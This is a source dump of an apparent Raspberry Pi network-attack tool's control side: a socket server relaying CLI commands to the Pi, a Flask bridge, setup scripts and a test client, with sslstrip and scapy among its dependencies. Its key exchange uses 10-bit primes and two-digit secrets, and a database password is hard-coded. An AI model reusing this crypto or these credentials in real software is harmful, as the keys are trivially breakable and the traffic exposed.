43 |     s = current_app.config["server"]
44 |     s.send_to_pi(CLI, "0", command)
45 |     s.pi_resp_event.wait()
46 |     s.pi_resp_event.clear()
47 | 
48 |     data["prompt"] = ansi_escape.sub('', (s.pi_resp.split("\n")[-1]))
49 |     data["response"] = conv.convert("\n".join(s.pi_resp.rstrip().split("\n")[:-1]))
50 |     return jsonify(**data)
51 | 


--------------------------------------------------------------------------------
/pip_dependencies:
--------------------------------------------------------------------------------
 1 | flask
 2 | netifaces
 3 | colorama
 4 | scapy
 5 | netaddr
 6 | pexpect
 7 | wifi
 8 | python-wifi
 9 | psycopg2
10 | pycrypto
11 | nose
12 | flask_cors
13 | sslstrip
14 | ansi2html
15 | 


--------------------------------------------------------------------------------
/scans.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ecthros/pina-colada/672ca4e3c01644dd611664ddf7474efa9dc2bc57/scans.py


--------------------------------------------------------------------------------
/server.py:
--------------------------------------------------------------------------------
  1 | import socket
  2 | import threading
  3 | import os
  4 | import traceback
  5 | import random
  6 | import base64
  7 | import importlib
  8 | import inspect
  9 | import sys
 10 | import ssl
 11 | import core
 12 | import multiprocessing
 13 | 
 14 | from pinacolada_website import app
 15 | from Crypto.Cipher import AES
 16 | from Crypto import Random
 17 | from Crypto.Util import number
 18 | from datetime import datetime
 19 | 
 20 | 
 21 | VERBOSE = True
 22 | 
 23 | BS = 16
 24 | pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
 25 | unpad = lambda s : s[0:-ord(s[-1])]
 26 | 
 27 | SEP = "|:|"
 28 | END_SEP = "~"
 29 | 
 30 | MSG = 0
 31 | NEWC = 1
 32 | CLOSE = 2
 33 | INFO = 3
 34 | REQ = 4
 35 | RELOAD = 5
 36 | 
 37 | TUNNEL_INIT = 20
 38 | 
 39 | CLI_INIT = 10
 40 | CLI = 11
 41 | CLI_RESP = 12
 42 | 
 43 | 
 44 | def get_date():
 45 |     return "%02d:%02d:%02d" % (datetime.now().hour, datetime.now().minute, datetime.now().second)
 46 | 
 47 | class Server():
 48 | 
 49 |     def __init__(self, name, port):
 50 |         self.name = name
 51 |         self.port = port
 52 |         self.pi = None
 53 |         self.bind_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 54 |         
 55 |         self.SERVER_VERSION = 0.5
 56 | 
 57 |         self.pi_resp_event = threading.Event()
 58 |         self.pi_resp = ""
 59 |         self.clients = {}
 60 |         self.threads = {}
 61 |         self.ips = {}
 62 |         self.ids = {}
 63 |         self.keys = {}
 64 |         self.tunnels = {}
 65 | 
 66 |     #################################################################
 67 |     #
 68 |     # Server Handling
 69 |     #
 70 |     #################################################################
 71 | 
 72 |     def server(self):
 73 |         try:
 74 |             try:
 75 |                 self.bind_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
 76 |                 self.bind_socket.bind(("0.0.0.0", self.port))
 77 |             except socket.error:
 78 |                 print("[!] %s startup failed - can't bind to %s:%d" % (self.name, "0.0.0.0", self.port))
 79 |                 return
 80 |             self.bind_socket.listen(10000)
 81 |             sys.stdout.write("[*] %s startup successful - listening on %s:%s\n" % (self.name, "0.0.0.0", self.port))
 82 |             sys.stdout.flush()
 83 |             while True:
 84 |                 try:
 85 |                     client, addr = self.bind_socket.accept()
 86 |                     #client = ssl.wrap_socket(client_sock, server_side=True, certfile="cert/server.crt", keyfile="cert/server.key")
 87 | 
 88 |                     cid = random.randint(0, 99999)
 89 |                     self.ips[cid] = addr[0]
 90 |                     print("[*] Accepted connection from %s:%d - ID: %d" % (addr[0], addr[1], cid)),
 91 | 
 92 |                     self.threads[cid] = threading.Thread(target=self.handle_client, args=(client, cid))
 93 |                     self.threads[cid].start()
 94 |                 except Exception as exc:
 95 |                     client.shutdown(socket.SHUT_RDWR)
 96 |                     client.close()
 97 |         except Exception as exc:
 98 |             print exc
 99 |             self.print_exc(exc, "")
100 |             self.shutdown()
101 |         finally:
102 |             self.shutdown()
103 | 
104 |     def shutdown(self):
105 |         print("[!] Shutting down %s..." % self.name)
106 |         self.bind_socket.close()
107 |         for sock in self.clients:
108 |             self.clients[sock].send("[!] Shutting down server...")
109 |             self.close(sock)
110 | 
111 |     #################################################################
112 |     #
113 |     # Client Handling
114 |     #
115 |     #################################################################
116 | 
117 |     def handle_client(self, c, cid):
118 |         try:
119 |             #Diffie-Helmen Exchange
120 |             shared_prime = number.getPrime(10)
121 |             shared_base = number.getPrime(10)
122 |             server_secret = random.randint(0, 99)
123 |             c.send(str(shared_prime) + "|" + str(shared_base) + "~")
124 |             a = ((shared_base**server_secret) % shared_prime)
125 |             print "sending %s to client" %( str(shared_prime) + "|" + str(shared_base))
126 |             c.send("%ld~" % a)  # send A
127 |             b = long(c.recv(1024))  # receive B
128 |             print "got %ld from client" % b
129 |             self.keys[c] = pad("%ld" % ((b ** server_secret) % shared_prime))
130 |             print self.keys[c]
131 |             n = c.recv(1024)
132 |             print n
133 |             print self.decrypt(n, c)
134 |             _, name, name = self.unpack_data(self.decrypt(n, c))
135 |             name = name.replace(END_SEP, "").replace(SEP, "")
136 |             print("(%s)" % name)
137 |             self.ids[cid] = name
138 |             self.clients[cid] = c
139 |             if name == "PinaColada":
140 |                 self.pi = c
141 |                 app.config["server"] = self
142 |                 print "[*] Pina Colada has connected."
143 |             else:
144 |                 print '[*] Tunnel initialized for user %s' % name
145 |                 self.tunnels[cid] = c
146 | 
147 |         except Exception as e:
148 |             self.print_exc(e, "\n[!] Failed to initialize client connection for %d." % id, always=True)
149 |             self.close(cid)
150 |             traceback.print_exc()
151 |             return False
152 |         try:
153 |             while True:
154 |                 d = c.recv(1024)
155 |                 print d
156 |                 print self.decrypt(d, c)
157 |                 msgs = filter(None, self.decrypt(d, c).split(END_SEP))
158 |                 print msgs
159 |                 for m in msgs:
160 |                     self.inbound(m, c)
161 |                 #print d
162 | 
163 |         except Exception as e:
164 |             self.print_exc(e, "")
165 |             print("[!] Connection closed from client %d (%s) - %s" % (cid, self.ids[cid], self.ips[cid]))
166 |             self.close(cid)
167 | 
168 |     def send_to_pi(self, message_type, name, message):
169 |         if self.pi is None:
170 |             print "ERROR: Pi is not connected, exiting."
171 |             return None
172 |         print "Sending %s to %s of type %d" % (message, name, message_type)
173 |         self.direct(message_type, name, self.pi, message)
174 | 
175 |     def inbound(self, d, c):
176 |         message_type, name, data = self.unpack_data(d)
177 |         if c is not self.pi:
178 |             if message_type == CLI_INIT:
179 |                 self.send_to_pi(CLI_INIT, self.get_id(c), "cli init")
180 |             elif message_type == CLI:
181 |                 self.send_to_pi(CLI, self.get_id(c), data)  # Pass through data d to pi
182 |         else:  # The pi has responded; forward traffic along
183 |             if name == "0":  # data was destined for server, web interface
184 |                 print "Have data for web interface..."
185 |                 self.pi_resp = data
186 |                 self.pi_resp_event.set()
187 |             else:  # server needs to forward
188 |                 self.direct(CLI_RESP, "0", self.tunnels[int(name)], data)
189 |         print("%s : %s (%d|%s): %s" % (get_date(), name, self.get_id(c), message_type, data))
190 | 
191 |     def get_id(self, c):
192 |         id = [id for id in self.clients if self.clients[id] == c]
193 |         return id[0] if id != [] else 0
194 | 
195 |     def get_ids_by_name(self, name):
196 |         return [id for id in self.ids if self.ids[id] == name]
197 | 
198 |     def get_client_name(self, client):
199 |         try:
200 |             return self.ids[self.get_id(client)]
201 |         except KeyError:
202 |             return None
203 |     #################################################################
204 |     #
205 |     # Command Handling
206 |     #
207 |     #################################################################
208 | 
209 |     def cmdloop(self, cmd):  # TODO
210 |         key = cmd.split()[0]
211 |         for id in self.clients:
212 |             self.direct(CLI_INIT, self.clients[id], "cli init")
213 | 
214 |             self.direct(CLI, self.clients[id], "list")
215 |         if key == "clients":
216 |             if len(self.ids.values()) == 0:
217 |                 print "[*] No currently connected clients"
218 |             else:
219 |                 c_id = list()
220 |                 for id in self.ids:
221 |                     c_id.append("<%s, %d>" % (self.ids[id], id))
222 |                 print "[*] Currently connected clients: " + ", ".join(c_id)
223 | 
224 |     def command(self, c, data):
225 |         data = data.lower()
226 |         if data == "\\help":
227 |             self.direct(MSG, c, self.build_help())
228 |         elif data == "\\info":
229 |             self.direct(MSG, c, "[*] %s" % self.get_versions())
230 |         elif data == "\\clients":
231 |             self.send_cur_clients(c)
232 |         else:
233 |             self.direct(MSG, c, "[!] Unknown command %s." % data)
234 | 
235 |     def close(self, id):
236 |         try:
237 |             self.direct(CLOSE, self.clients[id], "[!] You have been disconnected from the server.")
238 |         except:
239 |             pass
240 |         finally:
241 |             try:
242 |                 self.clients[id].close()
243 |                 self.clients.pop(id)
244 |                 self.ids.pop(id)
245 |             except:
246 |                 pass
247 | 
248 |     
249 |     def safe_command(self, cmd, expected):
250 |         return cmd != "" and len(cmd.split()) >= expected
251 | 
252 |     ####################################################################
253 |     #
254 |     # Message Handling
255 |     #
256 |     ####################################################################
257 | 
258 |     def encrypt(self, string, c):
259 |         iv = Random.new().read(AES.block_size)
260 |         cipher = AES.new(self.keys[c], AES.MODE_CBC, iv)
261 |         return base64.b64encode(iv + cipher.encrypt(pad(string)))
262 | 
263 |     def decrypt(self, msg, c):
264 |         enc = base64.b64decode(msg)
265 |         cipher = AES.new(self.keys[c], AES.MODE_CBC, enc[:16])
266 |         return unpad(cipher.decrypt(enc[16:]))
267 | 
268 |     def direct(self, msg_type, requester, c, msg):
269 |         c.send(self.encrypt(self.pack_data(msg_type, requester, msg), c) + "\n")
270 | 
271 |     def unpack_data(self, msg):
272 |         msgs = [self.replace_seps(s) for s in msg.split(SEP)]
273 |         try:
274 |             msgs[0] = int(msgs[0])  # convert type to int
275 |         finally:
276 |             return msgs
277 | 
278 |     def pack_data(self, type, name, data):
279 |         return str(type) + SEP + self.save_seps(name) + SEP + self.save_seps(data) + END_SEP
280 | 
281 |     def replace_seps(self, message):
282 |         return str(message).replace("|::|", SEP).replace("!::!", END_SEP)
283 | 
284 |     def save_seps(self, message):
285 |         return str(message).replace(SEP, "|::|").replace(END_SEP, "!::!")
286 | 
287 |     def print_exc(self, e, msg, always=False):
288 |         if always or VERBOSE:
289 |             print msg
290 |         if VERBOSE:
291 |             print e
292 |             traceback.print_exc()
293 | 
294 |     def start_server(self):
295 |         app.config["server"] = self
296 |         print "Starting web sever..."
297 |         app.run()
298 | 
299 | sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)  # force a flushed output for all prints
300 | if __name__ == "__main__":
301 | 
302 |     threads = {}
303 |     servers = {}
304 |     try:
305 |         main = Server("PinaColada", 9999)
306 |         thread = threading.Thread(target=main.server)
307 |         thread.start()
308 |         main.start_server()
309 |         '''
310 |         while True:
311 |             sys.stdout.write("Pina Colada >> ")
312 |             cmd = raw_input("")
313 | 
314 |             if not cmd:
315 |                 continue
316 | 
317 |             cmds = cmd.split()
318 | 
319 |             servers["PinaColada"].cmdloop(cmd)
320 |         '''
321 |     except KeyboardInterrupt:
322 |         print("[!] Exiting...")
323 |     except Exception as e:
324 |         print e
325 |         servers[0].print_exc(e, "")
326 |     finally:
327 |         main.shutdown()
328 |         thread.join()
329 |         os._exit(0)
330 | 


--------------------------------------------------------------------------------
/setup:
--------------------------------------------------------------------------------
 1 | echo '\n###\nUpdate & Installing main packages\n###\n'
 2 | {
 3 | apt-get update
 4 | apt-get install -y git-core
 5 | apt-get install -y postgresql
 6 | apt-get install -y build-essential
 7 | pip install --upgrade pip
 8 | } >/dev/null
 9 | 
10 | echo '\n###\nStarting PostgreSQL\n###\n'
11 | service postgresql start
12 | 
13 | echo '\n###\nConfiguring PostgreSQL User & Databadeb\n###\n'
14 | su -c "psql -c \"create user aces with password 'aces';\"" postgres
15 | su -c "createdb network" postgres
16 | 
17 | echo '\n###\nInstalling packages\n###\n'
18 | {
19 | apt-get install -y python-dev python-nmap python-netaddr python-tk libnetfilter-queue-dev
20 | } >/dev/null
21 | 
22 | echo '\n###\nInstalling python-netfilterqueue\n###\n'
23 | {
24 | git clone https://github.com/fqrouter/python-netfilterqueue.git
25 | python python-netfilterqueue/setup.py install
26 | } &>/dev/null
27 | 
28 | echo '\n###\nConfiguring PostgreSQL Tables\n###\n'
29 | python setup_postgres.py >/dev/null
30 | 
31 | echo '\n###\nDownload Python-Wifi\n###\n'
32 | wget https://pypi.python.org/packages/bc/ab/c49f97516f78c2b0cacb4f45873abc4ca9872942a9c4c19ded8052c8edda/python-wifi-0.6.1.tar.bz2 &>/dev/null
33 | wait ${!}
34 | 
35 | echo '\n###\nInstalling Python-Wifi\n###\n'
36 | {
37 | tar -xvf python-wifi-0.6.1.tar.bz2
38 | rm python-wifi-0.6.1.tar.bz2
39 | python python-wifi-0.6.1/setup.py install
40 | } >/dev/null
41 | 
42 | sleep 3
43 | echo '\n###\nSetup Ended! ;)\n###\n'


--------------------------------------------------------------------------------
/setup_postgres.py:
--------------------------------------------------------------------------------
1 | import psycopg2
2 | 
3 | conn = psycopg2.connect("dbname='network' user='aces' host='localhost' password='aces'")
4 | cur = conn.cursor()
5 | cur.execute("create table computers(id serial, ip inet, mac macaddr, ports varchar(50), last_online varchar(50));")
6 | cur.execute("Create table networks(id serial, name varchar(50), status varchar(50), last_online varchar(50));")
7 | conn.commit()
8 | cur.close()
9 | 


--------------------------------------------------------------------------------
/test_client.py:
--------------------------------------------------------------------------------
  1 | import socket
  2 | import threading
  3 | import sys
  4 | import os
  5 | import base64
  6 | import random
  7 | import json
  8 | import traceback
  9 | import core
 10 | import pexpect
 11 | import re
 12 | 
 13 | from colorama import *
 14 | from Crypto.Cipher import AES
 15 | from Crypto import Random
 16 | from datetime import datetime
 17 | 
 18 | GOOD = Fore.GREEN + " + " + Fore.RESET
 19 | BAD = Fore.RED + " - " + Fore.RESET
 20 | WARN = Fore.YELLOW + " * " + Fore.RESET
 21 | INFO = Fore.BLUE + " + " + Fore.RESET
 22 | prompt = Fore.BLUE + ">> " + Fore.RESET
 23 | 
 24 | SERVER_PORT = 9999
 25 | SERVER_IP = "127.0.0.1"
 26 | 
 27 | ERR_MSG = BAD + "Lost server connection. Please try again later."
 28 | SEP = "|:|"
 29 | END_SEP = "!:!"
 30 | 
 31 | ####################################################################
 32 | #
 33 | # Message Types
 34 | #
 35 | ####################################################################
 36 | 
 37 | MSG = 0
 38 | GET = 1
 39 | CLOSE = 2
 40 | INFO = 3
 41 | REQ = 4
 42 | 
 43 | CLI_INIT = 10
 44 | CLI = 11
 45 | CLI_RESP = 12
 46 | 
 47 | BS = AES.block_size
 48 | print BS
 49 | pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
 50 | unpad = lambda s: s[:-ord(s[len(s)-1:])]
 51 | 
 52 | replace_seps = lambda m: m.replace("|::|", SEP).replace("!::!", END_SEP)
 53 | save_seps = lambda m: m.replace(SEP, "|::|").replace(END_SEP, "!::!")
 54 | 
 55 | def get_date():
 56 |     return "%02d:%02d:%02d" % (datetime.now().hour, datetime.now().minute, datetime.now().second)
 57 | 
 58 | 
 59 | class PinaColadaSocket(object):
 60 |     def __init__(self, name, target_port, server_ip):
 61 |         self.port = target_port
 62 |         self.ip = server_ip
 63 |         self.name = name
 64 |         self.socket = None
 65 |         self.keys = {}
 66 |         print "[*] Attempting to connect to server"
 67 | 
 68 |     def connect(self):
 69 |         client = None
 70 |         try:
 71 |             client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 72 |             client.connect((self.ip, self.port))
 73 |             self.socket = client
 74 |             shared_prime, shared_base = client.recv(10).split("|")
 75 |             shared_prime = int(shared_prime)
 76 |             shared_base = int(shared_base)
 77 |             client_secret = random.randint(0, 99)
 78 |             a = long(client.recv(1024))
 79 |             b = (shared_base**client_secret) % shared_prime
 80 |             client.send("%ld" % b)
 81 |             self.keys[client] = pad("%ld" % ((a ** client_secret) % shared_prime))
 82 |             client.settimeout(None)  # Remove the timeout
 83 |             self.send(MSG, "Client1")
 84 |             print("[*] Successfully connected.")
 85 |             receive_loop = threading.Thread(target=self.receive, args=(client,))
 86 |             receive_loop.start()
 87 |             self.send(CLI_INIT, "cli init")
 88 |             while True:
 89 |                 line = raw_input(">> ")
 90 |                 self.send(CLI, line)
 91 | 
 92 |         except Exception as e:
 93 |             print e
 94 |             print traceback.print_exc()
 95 |             raw_input("")
 96 |         finally:
 97 |             self.shutdown()
 98 | 
 99 |     def shutdown(self):
100 |         print GOOD + "Exiting..."
101 | 
102 |     ####################################################################
103 |     #
104 |     # Message Handling
105 |     #
106 |     ####################################################################
107 | 
108 |     def send(self, message_type, data):
109 |         #print "SENDING: <%d, %s>" %(message_type, data)
110 |         self.socket.send(self.encrypt(self.pack_data(message_type, self.name, data), self.socket))
111 | 
112 |     def encrypt(self, string, sock):
113 |         iv = Random.new().read(AES.block_size)
114 |         cipher = AES.new(self.keys[sock], AES.MODE_CBC, iv)
115 |         return base64.b64encode(iv + cipher.encrypt(pad(string)))
116 | 
117 |     def decrypt(self, msg, sock):
118 |         enc = base64.b64decode(msg)
119 |         cipher = AES.new(self.keys[sock], AES.MODE_CBC, enc[:16])
120 |         return unpad(cipher.decrypt(enc[16:]))
121 | 
122 |     def unpack_data(self, msg):
123 |         msgs = [replace_seps(s) for s in msg.split(SEP)]
124 |         try:
125 |             msgs[0] = int(msgs[0])  # convert type to int
126 |         finally:
127 |             return msgs
128 | 
129 |     def pack_data(self, message_type, name, data):
130 |         return str(message_type) + SEP + save_seps(name) + SEP + save_seps(data) + END_SEP
131 | 
132 |     def print_msg(self, message):
133 |         print message
134 | 
135 |     def handle(self, data):
136 |         message_type, name, data = self.unpack_data(data)
137 |         message_type = int(message_type)
138 |         if message_type == CLI_INIT:
139 |             self.send(CLI_RESP, self.cli_init())
140 |         if message_type == CLI:
141 |             self.send(CLI_RESP, self.cli_communicate(data))
142 |         self.print_msg(data)
143 |     ####################################################################
144 |     #
145 |     # Receive Handling
146 |     #
147 |     ####################################################################
148 | 
149 |     def receive(self, sock):
150 |         try:
151 |             while True:
152 |                 data = sock.recv(1024)
153 |                 msgs = filter(None, self.decrypt(data, sock).split(END_SEP))
154 |                 for m in msgs:
155 |                     self.handle(m)
156 |         except Exception as e:
157 |             print e
158 |             traceback.print_exc()
159 |             sock.close()
160 |         finally:
161 |             sock.close()
162 |             self.shutdown()
163 | 
164 | if __name__ == "__main__":
165 |     PinaColadaSocket("Client", SERVER_PORT, SERVER_IP).connect()
166 | 


--------------------------------------------------------------------------------
/tests.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import pexpect
 3 | from colorama import *
 4 | import re
 5 | 
 6 | prompt = Fore.BLUE + ">> " + Fore.RESET
 7 | 
 8 | def base_test():
 9 |     cli = pexpect.spawn("sudo python cli.py")
10 |     cli.expect(re.escape(prompt))
11 |     pass
12 | 
13 | def padding_tests():
14 |     BS = 16
15 |     pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
16 |     unpad = lambda s : s[0:-ord(s[-1])]
17 |     print repr(pad("test"))
18 |     print pad("")
19 |     print pad("123456789876")
20 |     print pad("a")
21 |     pass
22 | 
23 | 
24 | padding_tests()
25 | 
26 | 


--------------------------------------------------------------------------------